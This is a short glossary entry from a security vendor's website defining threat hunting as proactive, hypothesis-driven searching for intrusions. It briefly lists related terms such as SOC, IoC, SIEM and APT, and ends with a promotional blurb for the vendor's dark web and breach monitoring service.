Threat Hunting
Proactive, human-led search for threats that have evaded automated detection within an environment.
Full Definition
Threat hunting is the proactive, iterative practice of searching through networks, endpoints, and datasets to detect malicious activities that have evaded automated security controls. Unlike reactive incident response, threat hunting operates on the assumption that adversaries are already present in the environment and actively looks for evidence of compromise.\n\nEffective threat hunters develop hypotheses based on threat intelligence (known attacker TTPs, recent IoCs, industry-specific threats) and then use data analytics, forensic tools, and security intuition to test those hypotheses against telemetry data. Findings either confirm a clean environment or uncover previously unknown intrusions.\n\nThreat hunting requires skilled analysts with deep knowledge of attacker techniques, normal environmental baselines, and forensic tools. It is a force multiplier for SOC teams, reducing dwell time — the period between an attacker entering a network and being detected — which averages over 200 days in undetected breaches.
Related Terms
Security Operations Center (SOC)
A centralized team and facility responsible for monitoring, detecting, and responding to cybersecurity threats.
Defensive SecurityIndicators of Compromise (IoC)
Forensic artifacts that indicate a system may have been breached or is actively under attack.
Threat IntelligenceSIEM (Security Information and Event Management)
A platform that aggregates and correlates security event logs to detect threats and support incident response.
Defensive SecurityAdvanced Persistent Threat (APT)
A prolonged, targeted cyberattack by a sophisticated, often state-sponsored threat actor.
Threat ActorsMonitor Your Exposure on Whiteintel
Understanding threats is the first step. Whiteintel continuously monitors dark web sources, stealer logs, and breach databases so you know the moment your organization's data is at risk.